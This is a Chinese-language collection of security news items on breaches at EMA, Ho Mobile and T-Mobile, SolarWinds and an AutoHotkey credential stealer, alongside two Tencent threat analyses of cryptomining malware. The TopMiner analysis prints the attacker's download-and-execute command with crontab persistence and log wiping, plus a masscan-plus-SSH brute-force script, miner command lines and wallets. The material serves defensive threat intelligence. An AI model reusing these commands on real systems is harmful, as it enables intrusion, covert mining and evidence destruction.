欧洲药品管理局(EMA)周二宣布，黑客泄露了去年年底发现的网络入侵行为中被盗的COVID-19疫苗信息。”正在进行的对EMA的网络攻击的调查显示，一些与COVID-19药品和属于第三方的疫苗有关的非法访问文件已经在互联网上泄露，”EMA在一份声明中报道。”执法部门正在采取必要的行动。” 最新情况是在辉瑞-BioNTech以及Moderna都表示，EMA已经通知这些公司，一些评估文件在对该机构的网络攻击中被获取。这次网络攻击发生在这两家公司向EMA提交了各自的COVID-19疫苗并要求批准在欧盟成员国紧急使用之后。 EMA总部设在阿姆斯特丹，是欧盟的一个主管卫生健康的机构，负责监督和评估人类和动物使用各种药品的情况。EMA于12月批准了辉瑞公司和BioNTech公司的疫苗，并在本月早些时候批准了Moderna COVID-19疫苗。 “该机构继续全力支持对数据泄露事件的刑事调查，并通知任何其他实体和个人，他们的文件和个人数据可能已经受到未经授权的访问，”该机构周二写道。 “该机构和欧洲药品监管网络仍在充分运作，与COVID-19药品和疫苗的评估和批准相关的时间表不受影响，”EMA指出。 EMA远不是COVID-19大流行期间第一个被黑客攻击的政府机构。世界卫生组织和美国卫生与人类服务部去年都是网络攻击的受害者，同时美国和世界各地的医院也成为勒索软件攻击的受害者，在某些情况下对服务产生了负面影响。         （消息及封面来源：cnBeta）

一、概述 受近期比特币爆涨带动数字虚拟币整体市值飙升影响，挖矿木马十分活跃。腾讯安全威胁情报中心检测到利用Redis未授权访问漏洞直接写入计划任务，下载用golang语言编写的挖矿木马下载器superman，根据挖矿算力推测该团伙已控制约1万台失陷系统进行门罗币挖矿。 腾讯安全近期已捕获较多利用golang语言编写的各类脚本木马，这些木马利用多个不同linux服务器组件的高危漏洞或弱密码入侵云服务器挖矿。对这些挖矿木马进行分析溯源，发现分属不同的黑产团伙控制，有点“千军万马一窝蜂携漏洞武器弱口令武器抢占云主机挖矿淘金”的意思。腾讯安全专家建议政企机构安全运维人员及时修补漏洞，排查弱口令，避免服务器沦为黑产控制的肉鸡。 在本例中，部分政企机构使用Redis时，由于没有对redis进行良好的配置，如使用空口令或者弱口令等，导致攻击者可以直接访问redis服务器，并可以通过该问题直接写入计划任务甚至可以直接拿到服务器权限。 自查处置建议 腾讯安全专家推荐的修复建议： 1.针对未配置redis密码访问的，需要对其进行配置添加用户和密码访问。针对弱口令则需要使用强密码。 2.如非必须，不对外开放redis端口，如需要对外开放服务则正确配置好ACL策略。 清理利用漏洞入侵的挖矿木马 1.清除计划任务中的python3.8m.sh相关条目； 2.在确认JavaUpdate和mysqlserver进程异常后，将其kill掉； 3.删除/var/tmp/下的.system-python3.8-Updates和.Javadoc 文件夹。 腾讯安全响应清单 针对supermanminer系列挖矿木马的活动，腾讯安全各产品均已响应拦截。 详细响应清单如下： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）SupermanMiner挖矿木马相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）SupermanMiner挖矿木马相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生 安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）SupermanMiner挖矿木马相关IOCs识别检测； 2）检测Redis未授权漏洞利用；   有关云防火墙的更多信息，可参考：  https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）已支持查杀SupermanMiner挖矿木马； 2）支持检测Redis未授权漏洞利用；   腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1）支持通过协议检测SupermanMiner挖矿木马与服务器的网络通信； 2）支持redis未授权访问漏洞利用检测。关于T-Sec高级威胁检测系统的更多信息，可参考：https://cloud.tencent.com/product/nta 二、详细分析 在使用redis应用时没有配置好访问策略导致攻击者可以利用弱口令或者空口令直接访问redis应用，并通过该应用直接向系统写入计划任务或者通过写入ssh公钥文件直接控制服务器。 通过未授权直接写入计划任务 在/var/spool/cron/root可以看到如下内容： 通过计划任务到pastebin下载脚本并执行。 下载的脚本内容用base64进行编码 解码后的内容： 该脚本主要功能是判断当前主机进程中是否有包含/var/tmp/.system-python3.8-Updates路径，然后指定站点下载superman文件，命名为f存放到/var/tmp/目录下，运行后将该文件删除。 superman是一个go编写的下载器，主要功能是下载核心挖矿程序xmrig及配置文件，并通过重新下载superman，并将其命名为mysqlserver，写入计划任务的方式进行持久化操作。 在运行superman后会写入计划任务。 其中python3.8m.sh的内容为： 脚本中的将mysqlserver是将superman下载后重命名，并将其存放在.system-python3.8-updates路径下。 通过流量分析发现，木马会频繁请求www.hellomeyou.cyou，且域名对应的IP一直在变化。该网站主要是查询在NameSilo注册的域名的whois信息等， 通过查看网站源码，发现源码中嵌入了一些内容，包括xmirg下载链接，矿池配置，superman下载链接及文件大小等。 通过查询域名相关信息该域名与namesilo属于同一组织，判断应该是hellomeyou这个网站被攻击后，在网站中嵌入了这些内容。 通过对superman文件分析，发现其通过正则表达式的方式匹配相应内容，分别匹配superman下载的url，xmrig下载路径，文件大小及矿池配置内容。 Superman文件通过github下载xmrig文件，并将其命名为JavaUpdate，并将其存放在/var/tmp/.Javadoc/路径下。同时通过匹配到的矿池内容修改相应的config.json文件。 Congfig文件内容： 其中挖矿使用矿池： 54.37.7.208:443（xmrpool.eu） 挖矿使用钱包： 88XEAsyefa9DyzyMJSdcEUR9PJPphWrSp632D2ia83zuJHLKDBxQZ1iDSVY8MspBoFiqdZdQupm4xBasSkahdfdXRuUU1j6 根据其钱包算力223Kh/s推算，该挖矿团伙已控制约1万台电脑进行挖矿。 Superman采用Go语言编写，除了启动挖矿程序之外，还具有下载文件、执行任意程序、执行远程命令、在线升级、安装crontab定时任务等功能。 IOCs URL hxxp://138.124.180.20:8080/superman hxxps://github.com/xmrig/xmrig/releases/download/v6.6.1/xmrig-6.6.1-linux-x64.tar.gz hxxps://pastebin.com/raw/xnxWdRJ8 hxxp://www.hellomeyou.cyou/ MD5 JavaUpdate a66c6c00d09529066b03070646127286 superman/mysqlserver 96dc8dcd5bf8f6e62c3ce5219e556ba3 矿池地址 xmrpool.eu 钱包地址88XEAsyefa9DyzyMJSdcEUR9PJPphWrSp632D2ia83zuJHLKDBxQZ1iDSVY8MspBoFiqdZdQupm4xBasSkahdfdXRuUU1j6 参考链接： https://paper.seebug.org/1440/

外媒The Verge援引《华尔街日报》报道称，发现自己受到SolarWinds黑客攻击影响的美国公司和机构名单还在不断增加，他们正在努力应对黑客入侵的一个巨大未知数：攻击程度有多严重。联邦司法系统现在很可能是其中之一，它不会冒任何风险。该机构对此十分担心，尽管目前疫情严重，但法院工作人员现在必须亲自送达敏感文件。 “根据今天宣布的新程序，向联邦法院提交的高度敏感的法院文件（HSDs）将以纸质形式或通过安全的电子设备被接受，并存储在一个安全的独立计算机系统中。这些密封的HSDs将不会上传到CM/ECF。” 这里的信息很清楚：在弄清楚黑客对系统做了什么之前，司法机构不希望其最敏感的文件出现在系统上，并且愿意在提交文件的过程中增加不少摩擦。他们不能再仅仅通过互联网发送，他们必须亲手递送实际的纸张或U盘。 “我们完全理解采取这些措施的实际影响，以及这些措施将给法院带来的行政负担，但是，任何这种负担都比保护有可能被泄露的密封文件的机密性的需要更重要。” 有关文件不一定是日常法庭诉讼的常规密封记录。《华尔街日报》的文章指出，HSDs可能包含调查人员如何处理案件的详细解释，以及目前可能被监视的人的信息。了解这些信息可以帮助某人避免被发现或调查，这就是为什么要保证这些信息的安全。 虽然这些措施表明，司法机构认为不能信任其现有的网络，但公众对法庭记录的访问不会改变。任何本来可以公开的记录仍然会被上传到案件管理和电子案卷系统中。         （消息来源：cnBeta；封面来自网络）

12 月 28 日，沃达丰（Vodafone）旗下意大利运营商 Ho Mobile 被曝发生了用户数据泄露事件。当时一名安全分析师指出，其在某个暗网论坛上发现了有人在兜售电信公司的数据库。虽然一开始打算冷处理，但本周一的时候，Ho Mobile 最终还是证实了本次大规模个人数据泄露。据说受影响的用户数量大约为 250 万，目前 Ho Mobile 正督促用户尽快更换 SIM 卡。 本周一，Ho Mobile 在官网上发布了一则公告，同时以短信形式向所有受影响客户发送了消息。 早些时候，@Bank_Security 猜测黑客攻破了这家运营商的服务器，并且盗走了详尽的用户数据，包括全名、手机号码、社保号码、电子邮件地址、出生日期、国籍、以及家庭住址。 虽然 Ho Mobile 表示本次入侵不涉及任何财务数据或通话详情，但还是承认黑客已掌握用户 SIM 卡相关的详情。 为避免欺诈或 SIM 卡伪造攻击，Ho Mobile 敦促所有受影响的客户（如有必要）及时更换 SIM 卡，且运营商承诺不收取任何费用。 Ho Mobile 写道：“你可携带有效身份证件，前往任何一处授权门店，并要求免费更换 SIM 卡”。后续该运营商还将与当地执法机构一道，对本次黑客攻击事件的幕后展开进一步的调查。       （消息及封面来源：cnBeta）

一、概述 腾讯主机安全（云镜）检测到挖矿木马TopMiner近期攻击十分活跃，该木马通过SSH弱口令爆破进行攻击入侵，会清除竞品挖矿木马，同时会使用爆破工具在内网横向传播。根据其挖矿钱包收益估算，约有1.5万台服务器被该团伙控制挖矿。由于其使用的挖矿木马名为top，腾讯安全将其命名为TopMiner挖矿木马。 TopMiner挖矿团伙针对SSH弱口令进行爆破攻击，成功后执行命令下载恶意shell脚本，并将启动脚本写入crontab定时任务进行持久化，shell脚本继续下载挖矿木马nginx、top启动挖矿。 木马入侵系统后，还会下载SSH爆破程序sshd，扫描到网络中开放22端口的Linux系统机器后，通过实时更新的密码字典对其root账号进行爆破攻击。攻击者在爆破攻击程序代码留下注释：”宽带充足基本可以12个小时扫描全球”，气焰可谓十分嚣张。 分析过程中，我们还在黑客控制的服务器上发现了具有执行远程命令功能的backdoor木马、具有DDoS攻击、远程shell功能的kaiji木马、黑客可使用这些木马对目标系统进行完全控制。 腾讯云主机安全（云镜）支持对云主机是否存在SSH空口令、弱口令进行检测并向客户告警，通过分析获得流行病毒木马内置的弱密码字典来检测云主机弱密码风险，具有很强的实战性。腾讯安全专家建议企业安全运维人员尽快解决服务器配置弱口令的风险。 自查处置建议 腾讯安全专家建议企业安全运维人员对服务器进行检查，清理以下相关项： 文件和进程： /tmp/.top-unix/nginx /tmp/.ICE-unix1/top /srv/.ICE-unix1/sshd /srv/.ICE-unix1/scan.sh /etc/ipv6_addrconf /etc/crypto Crontab定时任务： /tmp/.top-unix/top            -o              stratum+tcp://pool.supportxmr.com:8080               -u 42GLbQu8JBqVedDLHdpJEL8U5hSHwSuKh36HBebxeszHFEYDFLG5doz5LVsgAxfYoEJBQpeU39oq81MaJUmMUXYz2ZZXFXN -p X /tmp/.top-unix/nginx           -o           stratum+tcp://mine.c3pool.com:15555                 -u 43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL -p X /etc/crypto 腾讯安全响应清单 腾讯安全系列产品可针对TopMiner挖矿木马攻击传播的各个环节进行阻断拦截： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）TopMiner挖矿团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）TopMiner挖矿团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生 安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）TopMiner木马关联的IOCs已支持识别检测； 2）检测SSH弱口令爆破攻击。 有关云防火墙的更多信息，可参考：  https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）已支持查杀TopMiner木马程序； 2）主动检测系统是否存在SSH弱口令并提示； 3）检测SSH弱口令爆破攻击。 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1）已支持通过协议检测TopMiner木马与服务器的网络通信。 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta   二、详细分析 2.1、攻击入侵方式 病毒通过SSH弱口令爆破入侵系统，随后执行恶意命令下载脚本crypto，并将其写入crontab定时任务。 bash -c cd /etc wget -P /etc http://103.45.183.12:808/crypto chmod 0777 crypto nohup /etc/crypto > /dev/null 2>&1 & chattr +i /etc/crypto echo "/etc/crypto">>/etc/rc.local echo "/etc/crypto">>/etc/crontab echo > /var/log/wtmp history -c crypto会检查自己的挖矿进程/tmp/.ICE-unix1/top是否存在，如果不存在会判断是否有竞品挖矿木马存在，然后会杀掉竞品挖矿木马进程kswapd0、rsync、tsm、work32、work64、go、joseph，然后从C2服务器下载挖矿木马top并启动挖矿。 Top挖矿木马下载地址为：http[:]//xiazai.qq360bidu.me:808/top 挖矿使用矿池：91.121.140.167:443 挖矿使用钱包： 43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL 根据其矿池算力平均340KH/s，可推算该挖矿团伙已控制约1.5万台服务器进行挖矿，平均每天获利约154美元（0.17个门罗币），折合人民币约1000元。 2.2、横向移动 木马入侵系统后会接着下载端口爆破程序sshd以及待攻击的IP列表ips.txt、用户名字典user.txt、密码字典password.txt到/srv/.ICE-unix1/目录下。 观察文件被创建的时间，除了爆破程序sshd和用户名列表user.txt是6月份被修改过（可能是初次创建），其他文件操作时间均为12月，并且密码字典文件password.txt的修改时间就在近期。可见其感染系统后，攻击模块一直处于活跃状态，并且攻击对象、密码字典在持续更新扩充。 其中一个待爆破IP列表里有超过19万个IP地址： 爆破用户名：root，其中一个密码字典有1700余个密码，部分如下： 攻击时脚本scan.sh负责启动扫描进程masscan和爆破进程sshd，脚本代码如下： #!/bin/bash yum install masscan -y apt-get install masscan -y if [ $# -ne 4 ]; then echo "脚本默认安装扫描工具为masscan" echo "运行参数应为 ./scan.sh IP范围 端口 扫描线程 爆破线程" echo "IP范围支持1.0.0.0-1.255.255.255或 1.0.0.0/8这种" echo "扫描线程取1-100万左右,G口肯定是30-100万跑,线程越低结果越准,宽带充足基本可以1 2个小时扫描全球" exit fi echo '' > a.txt masscan $1 -p $2 --rate $3 --excludefile pingbi.txt -oL a.txt echo '' > ip.txt cat a.txt | grep -B0 open | grep -oP '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | sort -u > ip.txt./sshd ip.txt user.txt password.txt $2 $4   在实际攻击过程中，针对22端口进行爆破，爆破线程被设置为1000。 ./sshd ips.txt user.txt password.txt 22 1000   2.3、该团伙使用的其他木马 除了shell脚本、挖矿木马、爆破程序之外，我们在黑客控制的服务器上还发现了具有DDoS和远程shell功能的Kaiji木马，以及backdoor木马cnet2。 挖矿木马“ipv6_addrconf”、“systemd”、“top”为挖矿程序XMRig编译，其中“ipv6_addrconf”、“systemd”通过加UPX壳保护。 backdoor木马“cnet2”，具有监听端口，连接服务端，下载文件，执行远程命令等功能。 Kaiji木马“3”、“amd64”、“php-fpm”采用Go语言编写，具有DDoS攻击、远程shell以及SSH爆破攻击等功能，详情可参考腾讯安全此前的分析报告 https://s.tencent.com/research/report/1168.html。             IOCs IP 103.45.183.12（ZoomEye搜索结果） Domain xiazai.qq360bidu.me URL http[:]//xiazai.qq360bidu.me:808/top http[:]//103.45.183.12:808/crypto MD5 amd64 c491074d7723e6a6b1b1b8fb002f09b6 cnet2 9d2681b69116f866477dbe3bda0cbf49 top f74d1803befb993040aab866dbe6f12f systemd 640c6f1e7a5efdba49aeaa06d0dac304 crypto 9f0993ac09182d9ec08d1c562d2cfcbd sleep fbf0dccc0d9e674858d63e521eb122a0 sshd 15a653e96bada2fc2e47db59d863f4ff ipv6_addrconf b641d939b7cf70606ff5826f68c47d29 钱包： 42GLbQu8JBqVedDLHdpJEL8U5hSHwSuKh36HBebxeszHFEYDFLG5doz5LVsgAxfYoEJBQpeU39oq81MaJUmMUXYz2ZZXFXN 43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL

据外媒报道，美国第三大手机运营商T-Mobile最近完成了跟Sprint的260亿美元合并并在2020年底宣布了今年的第二次数据泄露。这家手机巨头在其网站上发布的一份通知中称，它最近发现一些客户的账号信息遭到了未经授权的访问，包括T-Mobile为提供手机服务而收集和制作的客户数据。 这些数据被称为客户专有网络信息(CPNI)，包括通话记录，如何时通话、通话时间时长、每次通话的呼叫者的电话号码和目的电话号码以及可能在客户账单上找到的其他信息。 不过该公司表示，黑客没有访问姓名、家庭或电子邮件地址、财务数据和账户密码（或pin码）。 通知没有说明T-Mobile何时发现了漏洞，只能说它现在正在通知受影响的用户。 T-Mobile的一位发言人并未回复记者的置评请求，但他告诉一家新闻网站，此次事件影响了T-Mobile约0.2%的用户–也就是约20万名用户。 这是近年来攻击这个手机巨头的最新一起网络安全事件。 2018年，T-Mobile表示多达200万用户的个人信息可能被窃取。一年后，该公司证实黑客入侵了另外100万个预付费用户的记录。就在2020年的几个月前，T-Mobile承认其电子邮件系统遭到入侵，黑客入侵了一些T-Mobile员工的电子邮件账户并曝光了一些客户数据。           （消息及封面来源：cnBeta）

援引《纽约时报》报道，SolarWinds 被黑事件对美国政府机构、私营企业造成的危害可能比预期的更加严重。根据目前掌握的最新信息，大约有超过 250 家美国联邦机构和企业受到影响。 微软表示，黑客入侵了 SolarWinds 的 Orion 监控和管理软件，从而让他们能够冒充该组织现有的任意用户和帐号，包括拥有高级别权限的账户。纽约时报报道称，疑似有俄罗斯政府背景的黑客组织利用供应链的层级来访问这些机构的系统。 纽约时报在报道中指出，美国网络司令部和国家安全局在外国网络内部放置的用于检测潜在攻击的预警传感器似乎在这次事件中失效了。此外，报道中还指出在今年总统大选期间，政府还利用了 SolarWinds 的资源和技术来进行检测，从而让黑客躲过了美国国土安全部门的检测。 本周早些时候，微软发现多个系统被渗透，其中不仅仅只是 SolarWinds 恶意代码。黑客能够 “查看一些源代码库中的源代码”，但授予访问权限的黑客账户并没有修改任何代码或系统的权限。 不过一个好消息是，微软发现“没有证据表明生产服务或客户数据被访问”，“没有迹象表明我们的系统被用来攻击他人”。         （消息及封面来源：cnBeta）

美国网络安全和基础设施安全局（CISA）已官方发布声明，督促美国联邦机构在年底之前更新SolarWinds 版本。 CISA发布的《紧急指令21-01补充指南》表示，所有运行SolarWinds Orion应用程序的美国政府机构都必须在年底之前将其更新为2020.2.1HF2最新版本。 SolarWinds在12月15日发布了2020.2.1HF2版本，以确保其安装安全并从其系统中删除与Sunburst相关的代码。《紧急指令21-01补充指南》于在发现SolarWinds供应链攻击后的12月18日发布。 美国CERT协调中心详细介绍了Orion API中的身份验证绕过漏洞，跟踪该漏洞为CVE-2020-10148，这使得黑客可以在Orion安装上执行远程代码。 黑客利用此漏洞在与SolarWinds供应链黑客无关的攻击中安装了后门。 基于此，CISA敦促相关联邦政府机构将SolarWinds Orion更新至2020.2.1HF2版本，以修复包括CVE-2020-10148在内的漏洞。 受影响的版本列表如下： Orion Platform 2019.4 HF5 版本2019.4.5200.9083 Orion Platform 2020.2 RC1 版本2020.2.100.12219 Orion Platform 2020.2 RC2 版本2020.2.5200.12394 Orion Platform 2020.2、2020.2 HF1版本2020.2.5300.12432             消息来源：Security Affairs，封面来自网络，译者：江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.c  

黑客正在分发一种新的以AutoHotkey（AHK）脚本语言编写的凭据窃取程序，这是自2020年初开始的攻击活动的一部分。 美国和加拿大银行用户是黑客的主要目标，特别是丰业银行、加拿大皇家银行、汇丰银行、Alterna银行、Capital One、Manulife和EQ Bank、还包括印度银行公司ICICI Bank。 AutoHotkey是Microsoft Windows的一种开源自定义脚本语言，旨在为宏创建和软件自动化提供简单的热键，允许用户在任何Windows应用程序中自动执行重复的任务。 多阶段感染链始于一个嵌入了Visual Basic for Applications（VBA）AutoOpen宏的带有恶意软件的Excel文件，该宏随后用于通过合法AHK脚本编译器可执行文件“adb.exe”删除并执行下载程序客户端脚本“adb.ahk”。 下载客户端脚本还负责实现持久性、分析受害者信息、以及从位于美国、荷兰和瑞典的C&C服务器下载并运行其他AHK脚本。 该恶意软件下载并执行AHK脚本以完成不同的任务，而不是直接从C&C服务器接收命令。 Trend Micro的研究人员表示：“攻击者可以决定上传特定的脚本来为每个用户或用户组实现自定义任务。这也阻止了主要程序被公开披露，特别是向其他研究人员或沙盒披露。” 其中最主要的是针对各种浏览器（比如Google Chrome、Opera、Microsoft Edge等）的凭证窃取程序。一旦安装，窃取程序会尝试在受感染的机器上下载SQLite模块（“sqlite3.dll”），使用它对浏览器应用程序文件夹中的SQLite数据库执行SQL查询。 最后，窃取程序从浏览器收集并解密凭证，并通过HTTP POST请求以明文形式将信息导出到C&C服务器。 恶意软件组件“在代码级别上组织得很好”，其中包含的使用说明（用俄语编写）可能意味着攻击链的背后存在一个“雇佣黑客”组织。 研究人员总结：“通过在受害者的操作系统中使用缺乏内置编译器的脚本语言，加载恶意组件并频繁更改C&C服务器，黑客就能隐藏其恶意意图。”         消息及封面来源：The Hacker News ；译者：芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ”   

FBI在近日发布的公共服务公告中表示：”黑客正在劫持安全性较弱的智能设备，通过家庭监控设备进行swatting攻击。” 黑客使用了之前在网上泄露用户名和密码，向执法部门举报，谎称受害者正在进行犯罪活动。 当执法部门到达住所时，黑客通过摄像头和扬声器监视警察，黑客有时还在共享在线社区平台上直播事件。这类 “swatting “事件的数量近年来在美国各地有所增加，更有甚者因警察误射毙命。 已知最早的“swatting”事件可追溯到2010年中期。如今的案件和起初的案件的区别在于，最初的设备并没有被黑客攻击。黑客会找出在网上直播婚礼、教会等活动，通过Discord机器人和暗网的服务拨打匿名电话报警。 FBI表示，为了应对数量激增的相关案件，他们现在正与设备供应商合作，并建议用户设置高强度密码。此外，FBI还提醒相关执法部门的快速响应。每个账户应使用高强度密码，并尽可能使用双重认证。             （消息来源：cnBeta；封面来源于网络）